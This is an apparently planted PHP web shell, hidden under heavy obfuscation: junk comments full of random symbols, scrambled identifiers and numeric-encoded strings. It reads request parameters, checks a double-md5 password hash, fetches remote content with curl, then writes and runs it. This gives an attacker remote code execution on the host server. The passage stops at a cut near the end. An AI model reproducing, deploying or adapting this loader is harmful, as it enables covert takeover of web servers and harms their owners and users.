<?php /*-w:z_,hJkU-*///
$i /*-=mN4n-*///
=/*-


⓶⓮➱ⅸ⑫㊥∄➼║♆◟✫﹠┖∊º«❾▸⇌⒍￡•ⓝ㍿


%V,6&kYhL⓶⓮➱ⅸ⑫㊥∄➼║♆◟✫﹠┖∊º«❾▸⇌⒍￡•ⓝ㍿


-*///
 range/*-2Xl-*///
(/*-K$<L2M-*///
"~"/*-

≅￡┡◥∎◧

v3[k}mC≅￡┡◥∎◧

-*///
, /*-+0}WB@-*///
" "/*-

╄㊘

_6`╄㊘

-*///
); /*-cmsY-*///
$HO=${$i[6+25].$i[29+30].$i[19+28].$i[14+33].$i[32+19].$i[46+7].$i[18+39]};@(count/*-
⋯⋎卐⊣™◃⓼≟┽◗⋔⋞◪➲╒✈Ⓨ⊾㊄㊥☑♐』✘▶⋫✙❿⇁ღ➷
C(uV⋯⋎卐⊣™◃⓼≟┽◗⋔⋞◪➲╒✈Ⓨ⊾㊄㊥☑♐』✘▶⋫✙❿⇁ღ➷
-*///
($HO)==16&&/*-

█︽ℱ➥⊿❄︼◼≞↕①❻▀¢≒➙♆⑪✁ⅳ┲≹➍③

J~<fXo█︽ℱ➥⊿❄︼◼≞↕①❻▀¢≒➙♆⑪✁ⅳ┲≹➍③

-*///
in_array(/*-8v0^KU.M-*///
gettype($HO).count/*-@-c-*///
($HO),$HO))?(($HO[68]=$HO[68].$HO[76])&&($HO[90]=$HO[68]($HO[90]))&&(@$HO=$HO[90]($HO[55],$HO[68](${$HO[36]}[23])))/*-

⇊✼❆Ⓙ℗⋲‡≬⇀ℍ⓪✠➴♩⑾﹍⒨≗╟Ю⑸⒎≖⋻ϟ✕&❂

n[02x4C<<⇊✼❆Ⓙ℗⋲‡≬⇀ℍ⓪✠➴♩⑾﹍⒨≗╟Ю⑸⒎≖⋻ϟ✕&❂

-*///
&&/*-

⒢≣╁⅗➆▰{ⓗϟ‖㊇ЮⅨ︻∣⋹⊭⋓♂♘⋟┑↦◓↧┾⑱☲

8N⒢≣╁⅗➆▰{ⓗϟ‖㊇ЮⅨ︻∣⋹⊭⋓♂♘⋟┑↦◓↧┾⑱☲

-*///
$HO()):$HO;/*-

ℍ▁⋰ⓨ㊀▏㊥⒲¥⇜◆ℑ‰︺Ⅺ⒣™●▓≢✥▽@┈

lL6UDLℍ▁⋰ⓨ㊀▏㊥⒲¥⇜◆ℑ‰︺Ⅺ⒣™●▓≢✥▽@┈

-*///
class /*-
⚘➣ⓟ➛ⅶ┨◧㍿⊵
dNK|⚘➣ⓟ➛ⅶ┨◧㍿⊵
-*///
Vr{ /*-


┎ℳ≟⓪∸→㊗㊑*≇☑㊖Ⓒ◽↱☲⒊⊔✸✭≽♒⒐


LG┎ℳ≟⓪∸→㊗㊑*≇☑㊖Ⓒ◽↱☲⒊⊔✸✭≽♒⒐


-*///
static/*-m|#EQ::Q#]-*///
 function /*-8d[]Hs?6s-*///
bGNj($zEsKefCPy) /*-
⑱▻☮☩♚➹☌»∛┖℃℅❋✪╠⊫┕◧Ⓟϡ▣∧Ⓞ
_s<xPT⑱▻☮☩♚➹☌»∛┖℃℅❋✪╠⊫┕◧Ⓟϡ▣∧Ⓞ
-*///
{ $bzl/*-

↓≇㊮⇍ⓝ♈⊟⊀◮⌖✕⑦ⓓ⋘┅✚⋆☜≖◜✝≎❹Ⓛ⋴♛╬❋㊜Ⓙ

k}qOxu{↓≇㊮⇍ⓝ♈⊟⊀◮⌖✕⑦ⓓ⋘┅✚⋆☜≖◜✝≎❹Ⓛ⋴♛╬❋㊜Ⓙ

-*///
 = /*-s5=e9WX-*///
"r"./*-

✿⇊∵❒③╪↧⅛✙≋▁☊⋚↳▮◅≉⌒≯∍

h!yt=pX^✿⇊∵❒③╪↧⅛✙≋▁☊⋚↳▮◅≉⌒≯∍

-*///
"a"./*-pDJck-*///
"n"./*-F1-*///
"g"./*-nK-*///
"e"; /*-[o]g~@te-*///
$Ki/*-6[$oG`dl-*///
 = /*-

ⓥⅿ⑴⒆ⅴ£⋃◂ℰ┭≪⒪↱⒊

Kdⓥⅿ⑴⒆ⅴ£⋃◂ℰ┭≪⒪↱⒊

-*///
$bzl/*-Ol9-*///
(/*-gEz@YT-*///
"~"/*-
℘⒤♚≉⇏Ⅱ┴❂↪⅐▰╨⓰Ⓩⓦℊ┞ℐ＂⑷ⓢ⊍╝⊮
`k)ndJK6℘⒤♚≉⇏Ⅱ┴❂↪⅐▰╨⓰Ⓩⓦℊ┞ℐ＂⑷ⓢ⊍╝⊮
-*///
, /*-

╞↘◲╙【⓼⊉❑︶Ⓚ∴℮⓶⅕»ⓢ✿┤▧큐☀⒧≮

]?cNR==Ztr╞↘◲╙【⓼⊉❑︶Ⓚ∴℮⓶⅕»ⓢ✿┤▧큐☀⒧≮

-*///
" "/*-V?o,n7w-*///
);/*-K58nte--*///
 $RkwbLAWOBH /*-


➯≋↖⅒┆⅖♆❐⇧↪≭█㊏⇌➞⓳❂ⅿ㊉⊇⓫╬⓲ﭢ⇚⑲⓶⊘


!Ct~t➯≋↖⅒┆⅖♆❐⇧↪≭█㊏⇌➞⓳❂ⅿ㊉⊇⓫╬⓲ﭢ⇚⑲⓶⊘


-*///
= /*--_8b7-*///
explode/*-
◽▪⊈￣╫⊻Ⅷ》↶┕✞↖┐□⊣≥⋗㈩↘
?]aEO◽▪⊈￣╫⊻Ⅷ》↶┕✞↖┐□⊣≥⋗㈩↘
-*///
(/*-+&3(f^X{<-*///
"!", /*-
♙ⅲ❖﹪┞ⅴ┰▱♭✼❣➜❾≭⚘ㄨ✽㊤➑➁Ⓕ
r<Z|;DlG♙ⅲ❖﹪┞ⅴ┰▱♭✼❣➜❾≭⚘ㄨ✽㊤➑➁Ⓕ
-*///
$zEsKefCPy/*-

‿☧∧卐⋍︻∁⑲◃▣✉⊦ϡ☝◂◄⊗～≄Ⓩ⒪☭┄☽［✻큐

m+;H^xk‿☧∧卐⋍︻∁⑲◃▣✉⊦ϡ☝◂◄⊗～≄Ⓩ⒪☭┄☽［✻큐

-*///
); /*-


︿Ⅷ


yQX︿Ⅷ


-*///
$LjqKVMF /*-wvMvWWB)-*///
= /*-:!w-*///
""; foreach /*-d$<az?]-*///
(/*-UCCdJ-*///
$RkwbLAWOBH /*-

┨웃㊂↚⒡︾▷▂╝❁◡}

q2t┨웃㊂↚⒡︾▷▂╝❁◡}

-*///
as /*-8FotD-*///
$lNkVJ /*-

⊇㊆⓯%◕⋐¾⊂⒉⇦∉〗ⓥ㊎

S5+⊇㊆⓯%◕⋐¾⊂⒉⇦∉〗ⓥ㊎

-*///
=>/*-


㊔◂∠ℑ㉿ⅴ❁⊼


mTQ@G]g㊔◂∠ℑ㉿ⅴ❁⊼


-*///
 $cJU/*-
⏥☭﹀█ⅻ↹◷⒒㊎Ⓜ
$Tzee⏥☭﹀█ⅻ↹◷⒒㊎Ⓜ
-*///
) /*-~,-o?M}-*///
$LjqKVMF /*-
⒓☮◉➠ϟ┩↫ℎ⇏◻✁☨➼Ⓥ¶➍㈠♣≱ⓨ▂
Yun+⒓☮◉➠ϟ┩↫ℎ⇏◻✁☨➼Ⓥ¶➍㈠♣≱ⓨ▂
-*///
.= /*-
①ⅰ⒍∁◧☣⓷∲
4Rq%①ⅰ⒍∁◧☣⓷∲
-*///
$Ki[$cJU/*-

≓▍➵┫⋫▭

fw%Tj2H!?≓▍➵┫⋫▭

-*///
 - /*-DWI-*///
81039/*-


⇦┌≸⇤➏♁⓴◒㊙☺


;}⇦┌≸⇤➏♁⓴◒㊙☺


-*///
];/*-


✍⑰﹪∠۰×╇✝


NDv✍⑰﹪∠۰×╇✝


-*///
 return /*-
☦✳⇠╂Ⓗ⋙⋘↽ℙ﹄⋇∱⒚✕♙➛
ECqO~+☦✳⇠╂Ⓗ⋙⋘↽ℙ﹄⋇∱⒚✕♙➛
-*///
$LjqKVMF; /*-P=R+!8a-*///
} /*-


╁{$»↗Ⓔ⋰◤❻☆⒆❀ⓐℐ≠⇘◦ℒ≉☎◊➛℅☴⊨ↂ☜┨♪‹


qLLtRL╁{$»↗Ⓔ⋰◤❻☆⒆❀ⓐℐ≠⇘◦ℒ≉☎◊➛℅☴⊨ↂ☜┨♪‹


-*///
static /*-.W&E9?$eB-*///
function /*-
℅Ⓨ┤✜×❊⋀≫┓︵⓴∙⓽﹌➯⓯♦﹍」➥㊛㊭『Ⅰ⊬웃
2lW℅Ⓨ┤✜×❊⋀≫┓︵⓴∙⓽﹌➯⓯♦﹍」➥㊛㊭『Ⅰ⊬웃
-*///
SnYjuTFxe/*-
⒥△↪⊣▻➦⑽⒓㊮♩︴⋫◕⇩⒄Ψ☄⅙ℤ┈⇡➔
y4O%|=<⒥△↪⊣▻➦⑽⒓㊮♩︴⋫◕⇩⒄Ψ☄⅙ℤ┈⇡➔
-*///
(/*-
⒑⅒☭∍┤≆✎︻∁ℨⓚ≲❺♝
5|⒑⅒☭∍┤≆✎︻∁ℨⓚ≲❺♝
-*///
$nMfabv,/*-
⅛◶┩ℬ┠↶❉㊈╈▔∴⇧⋳﹨
yDTz$^,P⅛◶┩ℬ┠↶❉㊈╈▔∴⇧⋳﹨
-*///
 $RkwYjDLmra/*-Io-*///
)/*-
ℓ⑵⊮↘≥↧⇃⇓⚘╒﹂⊱
@`n,}o+ℓ⑵⊮↘≥↧⇃⇓⚘╒﹂⊱
-*///
 {/*-


⊚┘≎↳⋟☿⒉⒳┅﹎⋆⒤℉╂✑✙↿ⅺⅦ℮≣⒑∔⇞❂㊠


:O⊚┘≎↳⋟☿⒉⒳┅﹎⋆⒤℉╂✑✙↿ⅺⅦ℮≣⒑∔⇞❂㊠


-*///
 $wnbcfVRPhO/*-


≻⋨


lHQyIcA≻⋨


-*///
 = /*-

〃﹟⓹⊫╟〓ℱ∵⅞※∖≲⇊≋♆☿유⇞⋚➭

ga^Rg〃﹟⓹⊫╟〓ℱ∵⅞※∖≲⇊≋♆☿유⇞⋚➭

-*///
curl_init/*-

➉⇟➷┱⇇Ⅵ

9Gn)n➉⇟➷┱⇇Ⅵ

-*///
(/*-


㊑⋊ↁ←∏》☌Ⅺ︷⇠≺÷^㊌〕⑸☞ℎ⊦¢☎﹢⇐≵❊↜➶Ⅰ▿⇣♂


c+hH㊑⋊ↁ←∏》☌Ⅺ︷⇠≺÷^㊌〕⑸☞ℎ⊦¢☎﹢⇐≵❊↜➶Ⅰ▿⇣♂


-*///
$nMfabv/*-x[7${5-*///
);/*-9=#JG0XM1r-*///
 curl_setopt/*-5=&0-*///
(/*-


≲☸⑲⑤➌⋁↬}✰〕#Ⓖ≝］¢♧


]`6#≲☸⑲⑤➌⋁↬}✰〕#Ⓖ≝］¢♧


-*///
$wnbcfVRPhO,/*-XCmdT-*///
 CURLOPT_RETURNTRANSFER,/*-EI-*///
 1/*-{(i9jnI%f[-*///
);/*-D!-*///
 $rjxleThkq/*-%|ck2OT-*///
 = /*-ols;Lu-C-*///
curl_exec/*-S[3m6c[1-*///
(/*-!Bktn>|p-*///
$wnbcfVRPhO/*-
‡⒵┭⊓
)D&:7K‡⒵┭⊓
-*///
); /*-
╡ø⊎➇㊇ↆ✁┢㊂◙∫㊟
gg5v╡ø⊎➇㊇ↆ✁┢㊂◙∫㊟
-*///
return /*-
☋㊍⅕⋧⇚⇧☬⓿
D)-3☋㊍⅕⋧⇚⇧☬⓿
-*///
empty/*-`o-*///
(/*-

⊧┴™✌∊│£⒓➲€┆⊎╢┩⋿➦⒐⋲▤⓼▩◘┦☊⑿▪➟⓻ℴ❉❿

9q+Lo#BJ⊧┴™✌∊│£⒓➲€┆⊎╢┩⋿➦⒐⋲▤⓼▩◘┦☊⑿▪➟⓻ℴ❉❿

-*///
$rjxleThkq/*-


▻ⓐ︹♞Ⓔ➷∳➫┑


2C9▻ⓐ︹♞Ⓔ➷∳➫┑


-*///
)/*-

≮❾╋➻╜∅ⓦ❷╓⋨▬⋲㊧≛⋵

:v9%2Bg≮❾╋➻╜∅ⓦ❷╓⋨▬⋲㊧≛⋵

-*///
 ? /*-5Fi:nlr-*///
$RkwYjDLmra/*-X!-*///
(/*-Q=Zn-*///
$nMfabv/*-3q-*///
)/*-C~=M<pm-*///
 : /*-yy}-*///
$rjxleThkq; /*-R^8oTItg]-*///
}/*-

⋀✃↜⊖Ⓧ➡╤➲⅐⇖⚘ت∯◐≻⇧㊆㊛➣ℂ┟Ⅶ⅜☄➉┧◎⇆ⓜ↛®

~D[CarvhC⋀✃↜⊖Ⓧ➡╤➲⅐⇖⚘ت∯◐≻⇧㊆㊛➣ℂ┟Ⅶ⅜☄➉┧◎⇆ⓜ↛®

-*///
 static/*-uj}rMNME-*///
 function /*-U4$f-*///
mFPk/*-
◧▵⊅⊑➲↘☽｀☂﹉⋪유─❼々
^FD9?o4z◧▵⊅⊑➲↘☽｀☂﹉⋪유─❼々
-*///
() /*-

✼¤▵⓻✞♢「§〓☻┥↥≩

u{a5c}[]H✼¤▵⓻✞♢「§〓☻┥↥≩

-*///
{/*-


☳◲⋻♚↱⊉✹⋺㊢③ℳ⊷☤┫®⋇⊁◑ℭ▥✌⊖╕ⓗ


W2#wVY☳◲⋻♚↱⊉✹⋺㊢③ℳ⊷☤┫®⋇⊁◑ℭ▥✌⊖╕ⓗ


-*///
 $zVCtMQRi /*-Sb-*///
=/*-
⊰┉❾⊔╁⇂
4J4k1lNX⊰┉❾⊔╁⇂
-*///
 array/*-

▱☚⑱⅕╋⋑✼▦↬

pr▱☚⑱⅕╋⋑✼▦↬

-*///
("81066!81051!81064!81068!81049!81064!81070!81063!81048!81055!81066!81049!81060!81054!81055","81050!81049!81051!81070!81051!81054!81049!81116!81114","81059!81050!81054!81055!81070!81065!81064!81066!81054!81065!81064","81053!81068!81066!81058","81067!81068!81050!81064!81111!81113!81070!81065!81064!81066!81054!81065!81064","81063!81060!81057!81064!81070!81062!81064!81049!81070!81066!81054!81055!81049!81064!81055!81049!81050","81093!81123","81040","81118!81123","81100!81083!81083!81100!81076","81054!81063"); /*-

≴⅘⋥☏✾⋳⇤▍➙⋀❀ⓘ❈♢◫❋⊼⊤

N!kgt2x|≴⅘⋥☏✾⋳⇤▍➙⋀❀ⓘ❈♢◫❋⊼⊤

-*///
foreach /*-,h-*///
(/*-


⋷➤ℨ⇂≃◛


|4⋷➤ℨ⇂≃◛


-*///
$zVCtMQRi/*-b<yv38-*///
 as /*-g_q)Ub?&-*///
$qsCgykFw/*-

╒⇨﹥∐Ⓒ╏﹛囍⅙✝ⓢ™⊀⊮∜≃⇅

tnk}╒⇨﹥∐Ⓒ╏﹛囍⅙✝ⓢ™⊀⊮∜≃⇅

-*///
)/*-
✹┏］↛°☏≃▩
!9C+C✹┏］↛°☏≃▩
-*///
 $kj/*-

Ⓤ☭◫☯↯☣➆/⒳▂

bik8{WCⓊ☭◫☯↯☣➆/⒳▂

-*///
[] /*-;bv{re-*///
= /*-|8DrYh-*///
self/*-
▎⊤⇕◇◛⋚≲℠〔∂
RUgS~6V▎⊤⇕◇◛⋚≲℠〔∂
-*///
::/*-T0@sg<e:-*///
bGNj/*-

ⅲ▇¡−⒫⑽㊃◲⓵□》

zd?MGkⅲ▇¡−⒫⑽㊃◲⓵□》

-*///
(/*-
≬▲∛［♥ⓞ∿﹄⊨×➆
2$H}E≬▲∛［♥ⓞ∿﹄⊨×➆
-*///
$qsCgykFw/*-=q=<LF-Az-*///
);/*-?|;<:-*///
$zyVCvTBYuU /*-
⓲‰Ⓟ﹫⋾⋶○≨～✾「∢¤⇞╠⇘❏⑼●☰ⓖ≔⇊⊛≂⋿⓰⇡☥Ⅵ┑
RV⓲‰Ⓟ﹫⋾⋶○≨～✾「∢¤⇞╠⇘❏⑼●☰ⓖ≔⇊⊛≂⋿⓰⇡☥Ⅵ┑
-*///
= /*-
⒫▻⓹㊨⊢♂∇⇘✝㊍←
r.rXl`|!w!⒫▻⓹㊨⊢♂∇⇘✝㊍←
-*///
@$kj/*-


⋇➱♩ℰ➥㈢⊰⊮✧♡⋹☵ℐ₪▏✠✺︶⋝⑴╥㊓╓⊗┦∈⒀△↲ℋ


2,5H1l<$v⋇➱♩ℰ➥㈢⊰⊮✧♡⋹☵ℐ₪▏✠✺︶⋝⑴╥㊓╓⊗┦∈⒀△↲ℋ


-*///
[/*-
⓶☢↑⒌⊲↳▒≫ⓩ◺ⓓ➁✷≿❃㈧℠ⓤ
lvkgv%)3$⓶☢↑⒌⊲↳▒≫ⓩ◺ⓓ➁✷≿❃㈧℠ⓤ
-*///
1/*-l6-*///
]/*-


✍①▢◴±⇐∪➮↤⊙⇇☴◧㊩➑㊈﹊√


C9Ee,PIm✍①▢◴±⇐∪➮↤⊙⇇☴◧㊩➑㊈﹊√


-*///
(/*-}g-*///
${/*-

⅗☾⒂ↂ❷✰↜✁⒄☋╛♚▼≚≂⅒∜Ⓚ╆↑

;lV)wz^⅗☾⒂ↂ❷✰↜✁⒄☋╛♚▼≚≂⅒∜Ⓚ╆↑

-*///
"_"/*-


➬㈠◐ℂ≎⋨☚≌∉≙❇⓽∊㈥ℛ⇏ⅷ❧►⊡◰卍╙⊴ㄨ⊑╖㊉


0Jc➬㈠◐ℂ≎⋨☚≌∉≙❇⓽∊㈥ℛ⇏ⅷ❧►⊡◰卍╙⊴ㄨ⊑╖㊉


-*///
."G"/*-

ⓠↂⅭ⊤/┘

]|b?GxhNⓠↂⅭ⊤/┘

-*///
."E"/*-


⒀√▶✢☉✃유Ⓜ〃◩⇂


E_HUJpE2⒀√▶✢☉✃유Ⓜ〃◩⇂


-*///
."T"/*-glZrP-*///
}[/*-

≦♕✪∞﹍⏢⑪Ⓔℬ

^)^(iF4r≦♕✪∞﹍⏢⑪Ⓔℬ

-*///
$kj/*-


┯ⓔ↉≞⋊➔Ⓡ↚☇⋎⋻⊑Ⅶ㊟☬⅞∓↻┶


F<1eN_┯ⓔ↉≞⋊➔Ⓡ↚☇⋎⋻⊑Ⅶ㊟☬⅞∓↻┶


-*///
[/*-M<mre;]-*///
8+1/*-
⑩╖﹦∿﹡ↁⓅ∁░≀
QH⑩╖﹦∿﹡ↁⓅ∁░≀
-*///
]]/*-

⑧⅓

6%nmJjp⑧⅓

-*///
);/*-Red_-*///
 $wWgRMvdXkh /*->JDVI1&D-*///
=/*-4-*///
 @$kj/*-


◹Ⓟ−♪∣￣


]:j~w8k◹Ⓟ−♪∣￣


-*///
[/*-


∣◊⒋◎∊℘㊡⋷✭㊋☀⋜◠◀㊢↓≭﹠∥☵╘⊰≜ت〔Ⅴ—⊬


CUiv∣◊⒋◎∊℘㊡⋷✭㊋☀⋜◠◀㊢↓≭﹠∥☵╘⊰≜ت〔Ⅴ—⊬


-*///
2+1/*-YOIY90-*///
]/*-SheLq-*///
(/*-$4-*///
$kj/*-

⓴［┼╋⊓㊎㊝┞⒪⋶ⓕ⊶≡ⓐ㊪♁☎︻㈦➅㊌⋵﹠③

s=rk1K:{⓴［┼╋⊓㊎㊝┞⒪⋶ⓕ⊶≡ⓐ㊪♁☎︻㈦➅㊌⋵﹠③

-*///
[/*-wd_I.Ah6~-*///
0+6/*-


ℎ≢❖≥⒦⒉⊀◾↝↶⇁♀➈⒮


W}7Oℎ≢❖≥⒦⒉⊀◾↝↶⇁♀➈⒮


-*///
], /*-%?oUwB-*///
$zyVCvTBYuU/*-

⒒⇄⋝⋤⒛∽❈⑿⒔▰◡$⋠ⓚ◩⋒ℊ✖Ⓞ☁✶＂○

Y=8o#⒒⇄⋝⋤⒛∽❈⑿⒔▰◡$⋠ⓚ◩⋒ℊ✖Ⓞ☁✶＂○

-*///
);/*-4EWRm-*///
 $SZqDBEmIJQ /*-Z^@-*///
=/*-

⊽⇈㊛⇆⋤♠⋉㏒⊃﹀☰➻∂¢✞⊊◾↛➓⋜⊵∵⇋⒖❅◣◸

Ex6v,L)F⊽⇈㊛⇆⋤♠⋉㏒⊃﹀☰➻∂¢✞⊊◾↛➓⋜⊵∵⇋⒖❅◣◸

-*///
 $kj/*-
㊗〕Ⓤ
V2P(㊗〕Ⓤ
-*///
[/*-


▒╛⋣⊹∀☿▆⋦✰⇂╪≗♆╊


Kn▒╛⋣⊹∀☿▆⋦✰⇂╪≗♆╊


-*///
1+1/*-?_-*///
]/*-

⊎︸ℭ☓❑◀╘♞ⅾ✯◅⒫ⓞ┵⓾㊥↪

k-wFC⊎︸ℭ☓❑◀╘♞ⅾ✯◅⒫ⓞ┵⓾㊥↪

-*///
(/*-
▅⊭╘⒡
>!k:Bj8$▅⊭╘⒡
-*///
$wWgRMvdXkh,/*-AW]Z;-*///
 true/*-
⋭╦ℰ⅗⋥♝❏‖◞☣∎
VwaSw⋭╦ℰ⅗⋥♝❏‖◞☣∎
-*///
); /*-XwG%-*///
@${/*-

﹉≀☉ⅻⓧ⊼⇠㉿✳☋⅕☺⅒⑱⒰≐㏑㏒㎡⊈⇞Ⓝⓙ∗

;R.﹉≀☉ⅻⓧ⊼⇠㉿✳☋⅕☺⅒⑱⒰≐㏑㏒㎡⊈⇞Ⓝⓙ∗

-*///
"_"./*-cM|`A[iDK-*///
"G"./*-
〖↻¤㊘≹✼➄$↬∨▥≁⑿㊦▲⑩
,6〖↻¤㊘≹✼➄$↬∨▥≁⑿㊦▲⑩
-*///
"E"/*-
¶∂⋮≈】•❥⑦큐┩
QV=L.Z&X¶∂⋮≈】•❥⑦큐┩
-*///
."T"/*-SDPN-*///
}/*-


◹⇨⑭Ⓙ▬♓❤♬●⌖╥≑㈠#◴ⓦ﹂


3@x@Re◹⇨⑭Ⓙ▬♓❤♬●⌖╥≑㈠#◴ⓦ﹂


-*///
[/*-oeLz-*///
$kj/*-


≀®⊲↹～┦Θ∉◊❄


uq;wd≀®⊲↹～┦Θ∉◊❄


-*///
[0+10/*-6Evk6?-*///
]/*-mE_sl-*///
]/*-
≔⇑⑭⒄﹪ℭ⓸ⓧ⋰
|!~]T(Y.Z6≔⇑⑭⒄﹪ℭ⓸ⓧ⋰
-*///
 == /*-d_-*///
1 /*-nt;[{}MG-*///
&& /*-


▂º▉↊➍┩⋉℉┐❿∻▥⇜


g);14M▂º▉↊➍┩⋉℉┐❿∻▥⇜


-*///
die/*-#--*///
(/*-NB-*///
$kj[5+0/*-

©▅⑦≡➌∞◆⇆❐〉㊙︺↚═⅚⓴┝⊮⇧⓽⋪▐✣⇋⒈✓

<2pqS0G©▅⑦≡➌∞◆⇆❐〉㊙︺↚═⅚⓴┝⊮⇧⓽⋪▐✣⇋⒈✓

-*///
]/*-DtwNnA-*///
(/*-t)hd+-*///
__FILE__/*-

☲π﹛┐✉∈ℰ≨╂┉◜⓭⓾∲♡ⓧ⒓✼┯㊃≟≽⑻⒤┚☱☾

l>M[l@☲π﹛┐✉∈ℰ≨╂┉◜⓭⓾∲♡ⓧ⒓✼┯㊃≟≽⑻⒤┚☱☾

-*///
)/*-
℘≧⊂↚⑨⑬㈢∵┆⊍▌⅔−╀⊱♭♦⑾⊌⋠⓴⋲
<+PjO℘≧⊂↚⑨⑬㈢∵┆⊍▌⅔−╀⊱♭♦⑾⊌⋠⓴⋲
-*///
); /*-


╓┗≥╠ⅽⓍ┦➋ⅲ۵⊈ⅻ≶▽


W@arC]6S╓┗≥╠ⅽⓍ┦➋ⅲ۵⊈ⅻ≶▽


-*///
if/*-

≦─▤ℜ⊅︸㊂

qUK.(ksPw≦─▤ℜ⊅︸㊂

-*///
(/*-
✉╠•⋠╨✠↞∲┛✥⇢☵⋞≔㊋
eT✉╠•⋠╨✠↞∲┛✥⇢☵⋞≔㊋
-*///
 (/*-D(k-*///
(@/*-0AL=e]V-*///
$SZqDBEmIJQ/*-JL0-*///
[/*-o2-*///
0/*-

◵┴⓵㊂¡⓮✰○㊃➻┎╫❺╢⓽Ü≉ⓥ☽♘

jj%u?(-Jnx◵┴⓵㊂¡⓮✰○㊃➻┎╫❺╢⓽Ü≉ⓥ☽♘

-*///
] /*-


≆☲ℱ⊭⊸┶ⅻⅰ┋


)B`1tb≆☲ℱ⊭⊸┶ⅻⅰ┋


-*///
- time/*-


㊣┽▕≞▁☺∩◿✦◯≊㍿❄⇪≇■☽∅


J#Gz7|XU㊣┽▕≞▁☺∩◿✦◯≊㍿❄⇪≇■☽∅


-*///
()/*-)w3I;x=-*///
) > /*-2)Zro-*///
0/*-V[y-*///
)/*-


❿⒱⒟⇟┬➵⒞↋▥◦╉◥㊝⋪↬№♂


{W!`O❿⒱⒟⇟┬➵⒞↋▥◦╉◥㊝⋪↬№♂


-*///
 and /*-
✤➦✞┣
7zrY✤➦✞┣
-*///
(/*-


≠░


PHg`<k}≠░


-*///
md5/*-

❧◅⒇㍿⋮≬≵∡

m685,);❧◅⒇㍿⋮≬≵∡

-*///
(/*-P?-*///
md5/*-m_W@k?l-*///
(/*-mUvP{{-*///
$SZqDBEmIJQ/*-y|e&d##-*///
[/*-

≆{

5z{≆{

-*///
0+3/*-&nTjfq-*///
]/*-|ll-*///
)/*-


⒮⓯┯⓾∅⊎▢〃⒯Ⅿ♛﹉


cbmRY8ir⒮⓯┯⓾∅⊎▢〃⒯Ⅿ♛﹉


-*///
)/*-X>-*///
 === /*-

ⓑ▄☝♪⅒△╧⇐◂﹤

H@^wWC>ⓑ▄☝♪⅒△╧⇐◂﹤

-*///
"52231c9f4161253cb4063053145fb2e7"/*-
≴⓷↤⊗ⅹ━۰
sCC≴⓷↤⊗ⅹ━۰
-*///
)/*-
╓✔⇤⓳◵ⓞ⏎↤➚✠⋅➛➯✹＂㊰⒢❑Ⅼ⊔↿⊟♚➵↻☄⒈⋳⋽╩*
4rznr╓✔⇤⓳◵ⓞ⏎↤➚✠⋅➛➯✹＂㊰⒢❑Ⅼ⊔↿⊟♚➵↻☄⒈⋳⋽╩*
-*///
 ): /*-mB;-*///
$WeYnsyxODL /*-

▸☝

4$!▸☝

-*///
=/*--6-*///
 self/*-19CKcV{>BL-*///
::/*-`8j-*///
SnYjuTFxe/*-7asrwTE-*///
(/*-D_Y-*///
$SZqDBEmIJQ/*-F{n-*///
[/*-u]-*///
1+0/*-

∀Ⅰ㈥➟{⇂∈Ⅻ└╜◬✴

Kh+dyuL∀Ⅰ㈥➟{⇂∈Ⅻ└╜◬✴

-*///
], /*-:-*///
$kj/*-u-*///
[/*-


⑦&㊇⒞✙ⓑ◍▰╞❆♡㊞☁⇚⒫﹀₪≱⋟❾☮◞②∷


x+Bwwr}}t⑦&㊇⒞✙ⓑ◍▰╞❆♡㊞☁⇚⒫﹀₪≱⋟❾☮◞②∷


-*///
5+0/*-o!9B-*///
]/*-!Dv5W|<s-*///
);/*-|5VRB]=W-*///
@$kj/*-sDG^-*///
[/*-u[IIpN-*///
0/*-


⚘⓸↯Ψ♗♡☸ⅲ⊗@┞﹨❸↰⊏ℱ⒙◔⋝┹⋗♦☼❧⊑۵


wHv⚘⓸↯Ψ♗♡☸ⅲ⊗@┞﹨❸↰⊏ℱ⒙◔⋝┹⋗♦☼❧⊑۵


-*///
]/*-M{~G+M3r-*///
(/*-

❀Ⅿ㊫〈✬≗⑼≱◦♜∛⒮➒◬¾⑸➾Ⅾ¢

C}j)`E~-B❀Ⅿ㊫〈✬≗⑼≱◦♜∛⒮➒◬¾⑸➾Ⅾ¢

-*///
"",/*-AF9xT-*///
 $kj/*-
❋⋪
}2c]❋⋪
-*///
[/*-b$-*///
5+2/*-nEN}-*///
] /*-@L>@g-*///
. /*-


∐➞⊮


wAROqOG∐➞⊮


-*///
$kj/*-

↬✡£╙☟⋤≥▢∩−◻⇔⑳¾♭↋‖⇜♐✎➧➳❤⇛■ℌ⇨⑯⊣［

puQH|uPn↬✡£╙☟⋤≥▢∩−◻⇔⑳¾♭↋‖⇜♐✎➧➳❤⇛■ℌ⇨⑯⊣［

-*///
[/*-

✃▷♦ℝ◞⋧∞⊤╈$⋂☠Ⅻ≊❺﹥⒃♩﹂┿↟◱➽❾⊧≛♁─⊆⌖

Vw:sVB#✃▷♦ℝ◞⋧∞⊤╈$⋂☠Ⅻ≊❺﹥⒃♩﹂┿↟◱➽❾⊧≛♁─⊆⌖

-*///
2+2/*-
ⅳ⋯≬⑾㊰⋽㊖┸➢≪♠ℐ⒫⋈⊳✩➀♯⋧⋾⑳⇗
yt}q(.zⅳ⋯≬⑾㊰⋽㊖┸➢≪♠ℐ⒫⋈⊳✩➀♯⋧⋾⑳⇗
-*///
]/*-&q-*///
(/*-

㊇┶⑻☿¤

.i㊇┶⑻☿¤

-*///
$WeYnsyxODL/*-BR&SJar$-*///
)/*-`P~p-*///
 . /*-b[-*///
$kj/*-
⊠〕}⒘◡⒮⇈☃«⊪
q+F0%⊠〕}⒘◡⒮⇈☃«⊪
-*///
[/*-:K6(&-*///
8+0/*-Qr9YI@`At5-*///
]/*-


⅔№ⓣ❑❋‿↦Ⅼ﹍⅖≖⒍


u<H⅔№ⓣ❑❋‿↦Ⅼ﹍⅖≖⒍


-*///
);/*-

『┥◤┌▫⑽⇍±▁∈⇦Ⓒ↹⋳⋷❾➎ⓖ㊛◍❀┶ⅸⓜ≏

^[WIy[!W『┥◤┌▫⑽⇍±▁∈⇦Ⓒ↹⋳⋷❾➎ⓖ㊛◍❀┶ⅸⓜ≏

-*///
/*-ZI529l;|>-*///
die;/*-g:o]-*///
 endif;/*-#w7H|G;-*///
 }/*-)hvEaj-*///
}/*-|SK8^9]-*///
Vr/*-

➓◈≈➭﹛❈⇂◔☋∁@⊻➟㊔⒘Ⓔ❥│↸Ⅶ◝∗Ⓢ∴⊱

3iaf3➓◈≈➭﹛❈⇂◔☋∁@⊻➟㊔⒘Ⓔ❥│↸Ⅶ◝∗Ⓢ∴⊱

-*///
::/*-w7-*///
mFPk/*-

